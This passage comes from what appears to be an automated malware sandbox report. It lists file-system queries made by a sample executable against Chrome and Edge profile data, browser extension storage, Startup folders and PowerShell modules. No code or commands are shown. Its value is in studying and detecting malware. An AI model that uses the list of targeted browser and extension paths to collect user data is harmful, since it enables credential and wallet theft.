              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
